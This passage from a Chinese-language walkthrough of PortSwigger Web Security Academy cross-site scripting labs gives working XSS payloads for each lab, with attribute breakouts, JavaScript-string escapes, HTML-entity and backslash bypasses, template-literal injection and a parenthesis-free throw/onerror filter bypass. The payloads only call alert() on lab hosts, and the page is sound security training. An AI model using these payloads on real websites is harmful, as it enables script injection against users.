   <p><a href="http://img.e-com-net.com/image/info8/eddd78872de04c86882cd0702b75fcb1.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第53张图片" height="481" src="http://img.e-com-net.com/image/info8/eddd78872de04c86882cd0702b75fcb1.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <hr> 
   <p>part2:</p> 
   <p>将输入替换为以下负载以转义带引号的属性并注入事件处理程序：<br>  </p> 
   <pre><code>"onmouseover="alert(1)</code></pre> 
   <p><a href="http://img.e-com-net.com/image/info8/105004d5e21547569594d624d399924b.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第54张图片" height="302" src="http://img.e-com-net.com/image/info8/105004d5e21547569594d624d399924b.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p> 当鼠标移动到注入的元素上时，应该会触发弹窗</p> 
   <p><a href="http://img.e-com-net.com/image/info8/62873c7e85b0491a869dbcc48c16073c.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第55张图片" height="351" src="http://img.e-com-net.com/image/info8/62873c7e85b0491a869dbcc48c16073c.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C8%EF%BC%9A%E5%B0%86XSS%E5%AD%98%E5%82%A8%E5%88%B0%E9%94%9A%E4%B8%AD%20href%20%E5%B8%A6%E5%8F%8C%E5%BC%95%E5%8F%B7%E7%9A%84%E5%B1%9E%E6%80%A7HTML%E7%BC%96%E7%A0%81"><span style="background-color:#a2e043;">实验8：将XSS存储到锚中 href 带双引号的属性HTML编码</span></h2> 
   <p>信息：</p> 
   <p>本实验的评论功能中存在一个已存储的跨站点脚本漏洞</p> 
   <p>完成实验：提交一条评论，当评论作者姓名被单击时，该评论将调用alert函数</p> 
   <hr> 
   <p>part1:</p> 
   <p>在"网站"输入中使用随机字母数字字符串发布评论，然后使用Burp Suite拦截请求并将其发送到Burp Repeater</p> 
   <p><a href="http://img.e-com-net.com/image/info8/02b671c6a8184d7a88a7a1483c2b24c7.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第56张图片" height="367" src="http://img.e-com-net.com/image/info8/02b671c6a8184d7a88a7a1483c2b24c7.jpg" width="650" style="border:1px solid black;"></a> <a href="http://img.e-com-net.com/image/info8/e382838820e3440f983e586053d06a99.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第57张图片" height="481" src="http://img.e-com-net.com/image/info8/e382838820e3440f983e586053d06a99.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p>在website中加上字符串后</p> 
   <p>第二个Repeater选项卡中的随机字符串已反映在href属性中</p> 
   <p>（各处的输入的数据都是随便填的，为都是查看每个标签的属性）</p> 
   <p><a href="http://img.e-com-net.com/image/info8/366dd5a229264e9e8b0fd29aad0e0c1e.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第58张图片" height="481" src="http://img.e-com-net.com/image/info8/366dd5a229264e9e8b0fd29aad0e0c1e.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p></p> 
   <hr> 
   <p>part2:</p> 
   <p>将输入替换为以下有效负载，以注入调用alert的JavaScript URL：</p> 
   <pre><code>payload:
&website=javascript:alert(1)</code></pre> 
   <p><a href="http://img.e-com-net.com/image/info8/8e532d5acebb48b9be0685f0f0ade95a.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第59张图片" height="481" src="http://img.e-com-net.com/image/info8/8e532d5acebb48b9be0685f0f0ade95a.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p>点击即可弹窗</p> 
   <p><a href="http://img.e-com-net.com/image/info8/548a441cf18149c6ad2fd1919778e694.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第60张图片" height="391" src="http://img.e-com-net.com/image/info8/548a441cf18149c6ad2fd1919778e694.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p><a href="http://img.e-com-net.com/image/info8/6f815116776f441ca5a01a4adaba90f1.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第61张图片" height="201" src="http://img.e-com-net.com/image/info8/6f815116776f441ca5a01a4adaba90f1.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C20%EF%BC%9A%E8%A7%84%E8%8C%83%E9%93%BE%E6%8E%A5%E6%A0%87%E8%AE%B0%E4%B8%AD%E5%8F%8D%E5%B0%84%E7%9A%84XSS"><span style="background-color:#a2e043;">实验20：规范链接标记中反射的XSS</span></h2> 
   <p>信息：</p> 
   <p>本实验将用户输入反映在规范的链接标记中，并转义尖括号。</p> 
   <p>完成实验：对主页执行跨站点脚本攻击，注入调用alert函数的属性</p> 
   <p>为了帮助利用漏洞，可以假设模拟用户将按下以下组合键：</p> 
   <p>    Alt + Shift + X<br>     CTRL + ALT + X<br>     Alt + X</p> 
   <hr> 
   <p>part1:</p> 
   <p>访问以下URL，将YOUR-LAB-ID替换为您的实验室ID：</p> 
   <pre><code>https://YOUR-LAB-ID.web-security-academy.net/?%27accesskey=%27x%27onclick=%27alert(1)

我的是：
https://0ab1009604362b74c0215423009400cf.web-security-academy.net/?%27accesskey=%27x%27onclick=%27alert(1)</code></pre> 
   <p>这将X键设置为整个页面的访问键。当用户按下访问键时，将调用alert函数</p> 
   <p><a href="http://img.e-com-net.com/image/info8/a6af547250c64390af51a512f0b13494.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第62张图片" height="232" src="http://img.e-com-net.com/image/info8/a6af547250c64390af51a512f0b13494.jpg" width="650" style="border:1px solid black;"></a></p> 
   <hr> 
   <p>part2：</p> 
   <p>触发弹窗</p> 
   <p>要在自己身上触发漏洞利用，请按以下组合键之一：</p> 
   <p>    在Windows上：ALT + SHIFT + X<br>     在Mac操作系统上：CTRL + ALT + X<br>     在Linux上：Alt + X</p> 
   <p><a href="http://img.e-com-net.com/image/info8/d621608948f0495b95b7ff4f89688de5.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第63张图片" height="310" src="http://img.e-com-net.com/image/info8/d621608948f0495b95b7ff4f89688de5.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="4%E3%80%81%E7%BB%88%E6%AD%A2%E7%8E%B0%E6%9C%89%E8%84%9A%E6%9C%AC"><span style="background-color:#a2e043;">4、终止现有脚本</span></h2> 
   <p>1、在最简单的情况下，可以简单地关闭包含现有JavaScript的script标记，并引入一些新的HTML标记来触发JavaScript的执行。</p> 
   <pre><code>例如，XSS上下文如下：
<script>
...
var input = 'controllable data here';
...
</script>

可以使用以下有效负载打破现有JavaScript并执行您自己的JavaScript：
</script><img src=1 onerror=alert(document.domain)>

因为浏览器首先执行HTML解析以识别包含脚本块的页面元素，然后才执行JavaScript解析以理解和执行嵌入的脚本。上面的负载使原始脚本损坏，并带有未终止的字符串文字。但这并不妨碍后续脚本以正常方式解析和执行</code></pre> 
   <p><br> ————</p> 
   <p>涉及实验：<br> 实验21：将XSS反射到JavaScript字符串中，并使用单引号和反斜杠进行转义</p> 
   <hr> 
   <p>2、断开JavaScript字符串</p> 
   <p>如果XSS上下文在一个带引号的字符串文字中，通常可以跳出字符串直接执行JavaScript。必须按照XSS上下文修复脚本，因为其中的任何语法错误都将阻止整个脚本执行。</p> 
   <pre><code>以下是一些拆分字符串文字的有用方法：
'-alert(document.domain)-'
';alert(document.domain)//</code></pre> 
   <p></p> 
   <p>某些应用程序试图通过使用反斜杠转义任何单引号字符来防止输入中断JavaScript字符串。字符前的反斜杠告诉JavaScript解析器应该按字面解释该字符，而不是将其解释为字符串结束符等特殊字符。在这种情况下，应用程序经常会犯无法转义反斜杠字符本身的错误。这意味着攻击者可以使用他们自己的反斜杠字符来中和应用程序添加的反斜杠。</p> 
   <pre><code>1、例如，假设输入：
';alert(document.domain)//

转换为:
\';alert(document.domain)//


2、可以使用替代有效载荷:
\';alert(document.domain)//

转换为：
\\';alert(document.domain)//

在这里，第一个反斜杠意味着第二个反斜杠按字面解释，而不是作为特殊字符。这意味着引号现在被解释为字符串结束符，因此攻击成功。 </code></pre> 
   <p><br> 涉及实验：</p> 
   <p>实验9：将XSS反射到带有尖括号的JavaScript字符串HTML编码</p> 
   <p>实验22：将XSS反射到JavaScript字符串中，使用尖括号和双引号HTML编码并转义单引号</p> 
   <hr> 
   <p>3、一些网站通过限制允许使用的字符来增加XSS的难度。这可以在网站级别上实现，也可以通过部署WAF来阻止请求到达网站。在这些情况下，需要尝试使用其他方法来调用绕过这些安全措施的函数。执行此操作的一种方法是使用 throw 语句和异常处理程序。这使能够在不使用括号的情况下将参数传递给函数。下面的代码将 alert() 函数添加到全局异常处理程序，  throw 语句传递 1 给异常处理程序（在本例中 alert）.最终结果是 alert() 调用函数时使用 1作为论据。</p> 
   <pre><code>onerror=alert;throw 1</code></pre> 
   <p>使用此技术调用不带括号的函数有多种方法</p> 
   <p>————<br> 涉及实验：</p> 
   <p>实验26：JavaScript URL中反射的XSS，其中一些字符被阻止</p> 
   <hr> 
   <p>4、使用HTML编码</p> 
   <p>当XSS上下文是带引号的标记属性（如事件处理程序）中的一些现有JavaScript时，可以使用HTML编码来处理一些输入过滤器。</p> 
   <p>当浏览器解析出响应中的HTML标记和属性时，它将在进一步处理标记属性值之前对其执行HTML解码。如果服务器端应用程序阻止或净化了成功利用XSS所需的某些字符，通常可以通过对这些字符进行HTML编码来绕过输入验证。</p> 
   <pre><code>例如，如果XSS上下文如下所示：
<a href="#" onclick="... var input='controllable data here'; ...">

并且应用程序阻止或转义单引号字符，则可以使用以下有效负载来打破JavaScript字符串并执行您自己的脚本：
&apos;-alert(document.domain)-&apos;

（序列&apos;是一个HTML实体，表示撇号或单引号。因为浏览器在解释JavaScript之前对onclick属性的值进行HTML解码，所以实体被解码为引号，引号变成字符串分隔符，因此攻击成功）</code></pre> 
   <p>————</p> 
   <p>涉及实验：</p> 
   <p>实验23：将XSS存储到 onclick 带有尖括号和双引号的事件HTML编码的事件以及单引号和反斜杠转义的事件<br>  </p> 
   <hr> 
   <p>5、JavaScript模板文本中的XSS</p> 
   <p>JavaScript模板文字是允许嵌入JavaScript表达式的字符串文字。嵌入的表达式将被计算，并通常连接到周围的文本中。模板文本封装在反引号中，而不是普通的引号中，嵌入式表达式使用${...} 语法。</p> 
   <pre><code>例如，以下脚本将打印包含用户显示名称的欢迎消息：
document.getElementById('message').innerText = `Welcome, ${user.displayName}.`;

当XSS上下文进入JavaScript模板文本时，不需要终止文本。相反，只需使用${...} 用于嵌入JavaScript表达式的语法，该表达式将在处理文本时执行。例如，如果XSS上下文如下所示：
<script>
...
var input = `controllable data here`;
...
</script>

那么可以使用以下有效负载来执行JavaScript，而无需终止模板文本：
${alert(document.domain)}</code></pre> 
   <p><br> 涉及实验：</p> 
   <p>实验24：将XSS反射到模板文本中，带有尖括号、单引号、双引号、反斜杠和反记号</p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C21%EF%BC%9A%E5%B0%86XSS%E5%8F%8D%E5%B0%84%E5%88%B0JavaScript%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%AD%EF%BC%8C%E5%B9%B6%E4%BD%BF%E7%94%A8%E5%8D%95%E5%BC%95%E5%8F%B7%E5%92%8C%E5%8F%8D%E6%96%9C%E6%9D%A0%E8%BF%9B%E8%A1%8C%E8%BD%AC%E4%B9%89"><span style="background-color:#a2e043;">实验21：将XSS反射到JavaScript字符串中，并使用单引号和反斜杠进行转义</span></h2> 
   <p>信息：</p> 
   <p>本实验包含搜索查询跟踪功能中的一个反映的跨站点脚本漏洞。反射发生在JavaScript字符串内部，并转义了单引号和反斜杠。</p> 
   <p>完成实验：执行跨站点脚本攻击，该攻击会破坏JavaScript字符串并调用alert函数</p> 
   <hr> 
   <p>part1:</p> 
   <p>在搜索框中提交一个随机的字母数字字符串，然后使用Burp Suite拦截搜索请求并将其发送到Burp Repeater</p> 
   <p><a href="http://img.e-com-net.com/image/info8/71f22541ba9c427f9b9e7707fac697aa.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第64张图片" height="407" src="http://img.e-com-net.com/image/info8/71f22541ba9c427f9b9e7707fac697aa.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p><br> 随机字符串已经反映在JavaScript字符串中(script标签)</p> 
   <p><a href="http://img.e-com-net.com/image/info8/dc390c0608274ee79dd000bf96d1d0c8.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第65张图片" height="481" src="http://img.e-com-net.com/image/info8/dc390c0608274ee79dd000bf96d1d0c8.jpg" width="650" style="border:1px solid black;"></a><br> 尝试跳出引号</p> 
   <pre><code>payload：
aaaa'aaaaa</code></pre> 
   <p>观察到单引号被反斜杠转义，从而防止您跳出字符串</p> 
   <p> <a href="http://img.e-com-net.com/image/info8/f223522befff4f06893e85dcc7d06c33.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第66张图片" height="481" src="http://img.e-com-net.com/image/info8/f223522befff4f06893e85dcc7d06c33.jpg" width="650" style="border:1px solid black;"></a></p> 
   <hr> 
   <p>part2:</p> 
   <p> 跳出脚本块并注入新脚本：</p> 
   <pre><code></script><script>alert(1)</script></code></pre> 
   <p><a href="http://img.e-com-net.com/image/info8/55a4d7dba2bd4df7b6c3282e143b85ce.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第67张图片" height="481" src="http://img.e-com-net.com/image/info8/55a4d7dba2bd4df7b6c3282e143b85ce.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p>插入搜索框</p> 
   <p><a href="http://img.e-com-net.com/image/info8/4ea2287cf0fc48f38fa170fb74bb12d0.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第68张图片" height="403" src="http://img.e-com-net.com/image/info8/4ea2287cf0fc48f38fa170fb74bb12d0.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p>直接弹窗</p> 
   <p><a href="http://img.e-com-net.com/image/info8/42f41347d5f1485cbeef16357d644a18.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第69张图片" height="340" src="http://img.e-com-net.com/image/info8/42f41347d5f1485cbeef16357d644a18.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p><a href="http://img.e-com-net.com/image/info8/6cc4af1b53cf4aa38cd6a198984e94e4.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第70张图片" height="349" src="http://img.e-com-net.com/image/info8/6cc4af1b53cf4aa38cd6a198984e94e4.jpg" width="650" style="border:1px solid black;"></a></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C9%EF%BC%9A%E5%B0%86XSS%E5%8F%8D%E5%B0%84%E5%88%B0%E5%B8%A6%E6%9C%89%E5%B0%96%E6%8B%AC%E5%8F%B7%E7%9A%84JavaScript%E5%AD%97%E7%AC%A6%E4%B8%B2HTML%E7%BC%96%E7%A0%81"><span style="background-color:#a2e043;">实验9：将XSS反射到带有尖括号的JavaScript字符串HTML编码</span></h2> 
   <p>信息：</p> 
   <p>本实验包含搜索查询跟踪功能中的一个反映的跨站点脚本漏洞，其中尖括号被编码。反射发生在JavaScript字符串内部。</p> 
   <p>完成实验：执行跨站点脚本攻击，该攻击会破坏JavaScript字符串并调用alert函数。</p> 
   <hr> 
   <p>part：</p> 
   <p>在搜索框中提交一个随机的字母数字字符串</p> 
   <p>随机字符串已经反映在JavaScript字符串中</p> 
   <p><a href="http://img.e-com-net.com/image/info8/25bd225266a14c6b9b9e59909c0fba1c.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第71张图片" height="481" src="http://img.e-com-net.com/image/info8/25bd225266a14c6b9b9e59909c0fba1c.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <hr> 
   <p>part2：</p> 
   <p>插入XSS</p> 
   <p>使用以下有效负载插入，以断开JavaScript字符串并注入警报：</p> 
   <pre><code>'-alert(1)-'</code></pre> 
   <p><br><a href="http://img.e-com-net.com/image/info8/b86f292386b54605b2fbccbca6138368.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第72张图片" height="481" src="http://img.e-com-net.com/image/info8/b86f292386b54605b2fbccbca6138368.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p><a href="http://img.e-com-net.com/image/info8/75ba57d8a4154d388d878bc4b363bd7b.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第73张图片" height="391" src="http://img.e-com-net.com/image/info8/75ba57d8a4154d388d878bc4b363bd7b.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p> 完成实验</p> 
   <p><a href="http://img.e-com-net.com/image/info8/f1cd55dac11e430fb9bee130d7207212.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第74张图片" height="310" src="http://img.e-com-net.com/image/info8/f1cd55dac11e430fb9bee130d7207212.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C22%EF%BC%9A%E5%B0%86XSS%E5%8F%8D%E5%B0%84%E5%88%B0JavaScript%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%AD%EF%BC%8C%E4%BD%BF%E7%94%A8%E5%B0%96%E6%8B%AC%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7HTML%E7%BC%96%E7%A0%81%E5%B9%B6%E8%BD%AC%E4%B9%89%E5%8D%95%E5%BC%95%E5%8F%B7"><span style="background-color:#a2e043;">实验22：将XSS反射到JavaScript字符串中，使用尖括号和双引号HTML编码并转义单引号</span></h2> 
   <p>信息：</p> 
   <p>本实验包含搜索查询跟踪功能中的一个反映的跨站点脚本漏洞，其中尖括号和双引号是HTML编码的，而单引号是转义的。</p> 
   <p>完成实验：执行跨站点脚本攻击，该攻击会破坏JavaScript字符串并调用alert函数。</p> 
   <hr> 
   <p>part1：</p> 
   <p>在搜索框中提交一个随机的字母数字字符串</p> 
   <p><a href="http://img.e-com-net.com/image/info8/1e60c041533c41fca458f968cd198ff9.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第75张图片" height="481" src="http://img.e-com-net.com/image/info8/1e60c041533c41fca458f968cd198ff9.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p></p> 
   <p>随机字符串已经反映在JavaScript字符串中。<br> 尝试发送测试的payload观察转义情况</p> 
   <pre><code>aaaaaa'aaaaaa</code></pre> 
   <p>观察到单引号被反斜杠转义，从而防止跳出字符串</p> 
   <p><a href="http://img.e-com-net.com/image/info8/eb1df500d66f4e7893443d8f5685893d.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第76张图片" height="481" src="http://img.e-com-net.com/image/info8/eb1df500d66f4e7893443d8f5685893d.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p>尝试发送payload:aaa\aaaa，并注意反斜杠没有转义</p> 
   <p><a href="http://img.e-com-net.com/image/info8/24f387690d1546d99d6f9feb97aba0d8.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第77张图片" height="481" src="http://img.e-com-net.com/image/info8/24f387690d1546d99d6f9feb97aba0d8.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <hr> 
   <p>part2:</p> 
   <p>用以下有payload插入，以断开JavaScript字符串并注入alert函数</p> 
   <pre><code>\'-alert(1)//</code></pre> 
   <p><a href="http://img.e-com-net.com/image/info8/e1c96ae4f5d946288cca8e83d1109fcb.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第78张图片" height="481" src="http://img.e-com-net.com/image/info8/e1c96ae4f5d946288cca8e83d1109fcb.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p><a href="http://img.e-com-net.com/image/info8/b1c5ce790fd44a21b120f3c78945929b.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第79张图片" height="441" src="http://img.e-com-net.com/image/info8/b1c5ce790fd44a21b120f3c78945929b.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p> 完成实验</p> 
   <p><a href="http://img.e-com-net.com/image/info8/cc1eb03fd9d141c993a23e5cabca4d59.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第80张图片" height="319" src="http://img.e-com-net.com/image/info8/cc1eb03fd9d141c993a23e5cabca4d59.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C26%EF%BC%9AJavaScript%20URL%E4%B8%AD%E5%8F%8D%E5%B0%84%E7%9A%84XSS%EF%BC%8C%E5%85%B6%E4%B8%AD%E4%B8%80%E4%BA%9B%E5%AD%97%E7%AC%A6%E8%A2%AB%E9%98%BB%E6%AD%A2"><span style="background-color:#a2e043;">实验26：JavaScript URL中反射的XSS，其中一些字符被阻止</span></h2> 
   <p>信息：</p> 
   <p>本实验反映了在JavaScript URL中的输入，但并非一切都像看上去的那样。这最初看起来像是一个微不足道的挑战，但应用程序阻止了一些字符，试图防止XSS攻击</p> 
   <p>解决实验：执行跨站点脚本攻击，该攻击使用alert消息中某处包含的字符串1337调用alert函数</p> 
   <hr> 
   <p>part1:</p> 
   <p>payload：</p> 
   <pre><code>5&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'</code></pre> 
   <p>URL编码：</p> 
   <pre><code>5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27</code></pre> 
   <p>利用漏洞攻击使用异常处理调用带有参数的alert函数。使用throw语句，用一个空白注释分隔，以绕过没有空格的限制。alert函数被分配给onerror异常处理程序。</p> 
   <p>由于throw是一个语句，因此不能用作表达式。相反需要使用箭头函数来创建一个块，以便可以使用throw语句。然后需要调用这个函数，所以将它赋给window的toString属性，并通过强制window进行字符串转换来触发它。</p> 
   <hr> 
   <p>part2：</p> 
   <p>插入XSS</p> 
   <p>访问以下URL(将YOUR-LAB-ID替换为您的实验室ID)</p> 
   <pre><code>https://YOUR-LAB-ID.web-security-academy.net/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27

我的是：
https://0a33007103190c60c234a9f2008b003c.web-security-academy.net/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27</code></pre> 
   <p>实验得到解决</p> 
   <p><img alt="" height="0" src="http://img.e-com-net.com/image/info8/03d4971a26ed4e5ca795ccb8656e4e09.jpg" width="0"></p> 
   <p> 在单击页面底部的“返回博客”时才会调用alert函数</p> 
   <p><a href="http://img.e-com-net.com/image/info8/255ac605bda74a359b90356debf421e5.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第81张图片" height="310" src="http://img.e-com-net.com/image/info8/255ac605bda74a359b90356debf421e5.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C23%EF%BC%9A%E5%B0%86XSS%E5%AD%98%E5%82%A8%E5%88%B0onclick%E4%BA%8B%E4%BB%B6%E4%B8%AD%EF%BC%8C%E4%BD%BF%E7%94%A8%E5%B0%96%E6%8B%AC%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7HTML%E7%BC%96%E7%A0%81%EF%BC%8C%E4%BD%BF%E7%94%A8%E5%8D%95%E5%BC%95%E5%8F%B7%E5%92%8C%E5%8F%8D%E6%96%9C%E6%9D%A0%E8%BD%AC%E4%B9%89"><span style="background-color:#a2e043;">实验23：将XSS存储到onclick事件中，使用尖括号和双引号HTML编码，使用单引号和反斜杠转义</span></h2> 
   <p>信息：</p> 
   <p>本实验的评论功能中存在一个已存储的跨站点脚本漏洞。</p> 
   <p>完成实验：提交一条评论，当评论作者姓名被单击时，该评论将调用alert函数</p> 
   <hr> 
   <p>part1:</p> 
   <p>在"网站"输入中使用随机字母数字字符串发布评论<a href="http://img.e-com-net.com/image/info8/dd2f01807b364df8a03d0cff9ec41a43.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第82张图片" height="442" src="http://img.e-com-net.com/image/info8/dd2f01807b364df8a03d0cff9ec41a43.jpg" width="650" style="border:1px solid black;"></a><br> 刷新页面，在HTTP历史记录中观看</p> 
   <p>（随机字符串已反映在onclick事件处理程序属性中）</p> 
   <p> <a href="http://img.e-com-net.com/image/info8/f567aa9cd4d94100ad78e9bfd8b3c363.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第83张图片" height="481" src="http://img.e-com-net.com/image/info8/f567aa9cd4d94100ad78e9bfd8b3c363.jpg" width="650" style="border:1px solid black;"></a></p> 
   <hr> 
   <p>part2：</p> 
   <p>插入XSS</p> 
   <p>将评论的请求发送的repeater，最终的注入点在website</p> 
   <p>使用以下有效负载修改输入以注入调用alert的JavaScript URL：<br>  </p> 
   <pre><code>http://foo?&apos;-alert(1)-&apos;</code></pre> 
   <p><a href="http://img.e-com-net.com/image/info8/c3df9993189d454682ed9046f4d0896c.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第84张图片" height="394" src="http://img.e-com-net.com/image/info8/c3df9993189d454682ed9046f4d0896c.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p><a href="http://img.e-com-net.com/image/info8/838d83beb5c641a4ad565139486bb455.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第85张图片" height="262" src="http://img.e-com-net.com/image/info8/838d83beb5c641a4ad565139486bb455.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p>触发弹窗</p> 
   <p><a href="http://img.e-com-net.com/image/info8/f73532b3818d4e5493eaa76016a8a063.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第86张图片" height="437" src="http://img.e-com-net.com/image/info8/f73532b3818d4e5493eaa76016a8a063.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C24%EF%BC%9A%E5%B0%86XSS%E5%8F%8D%E5%B0%84%E5%88%B0%E6%A8%A1%E6%9D%BF%E6%96%87%E6%9C%AC%E4%B8%AD%EF%BC%8C%E5%B8%A6%E6%9C%89%E5%B0%96%E6%8B%AC%E5%8F%B7%E3%80%81%E5%8D%95%E5%BC%95%E5%8F%B7%E3%80%81%E5%8F%8C%E5%BC%95%E5%8F%B7%E3%80%81%E5%8F%8D%E6%96%9C%E6%9D%A0%E5%92%8C%E5%8F%8D%E8%AE%B0%E5%8F%B7"><span style="background-color:#a2e043;">实验24：将XSS反射到模板文本中，带有尖括号、单引号、双引号、反斜杠和反记号</span></h2> 
   <p>信息：</p> 
   <p>本实验包含搜索博客功能中的一个反映的跨站点脚本漏洞。反射发生在一个模板字符串中，该模板字符串带有尖括号、单引号和双引号，HTML编码，反引号转义</p> 
   <p>完成实验：执行跨站点脚本攻击，调用模板字符串中的alert函数</p> 
   <hr> 
   <p>part1:</p> 
   <p>在搜索框中提交一个随机的字母数字字符串</p> 
   <p>随机字符串已经反映在JavaScript模板字符串中</p> 
   <p><a href="http://img.e-com-net.com/image/info8/9206a1dca847415f9305f8418459a6a3.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第87张图片" height="481" src="http://img.e-com-net.com/image/info8/9206a1dca847415f9305f8418459a6a3.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p></p> 
   <p>将输入替换为以下有效负载以在模板字符串内执行</p> 
   <pre><code>JavaScript:${alert(1)}</code></pre> 
   <p>直接输入框输入</p> 
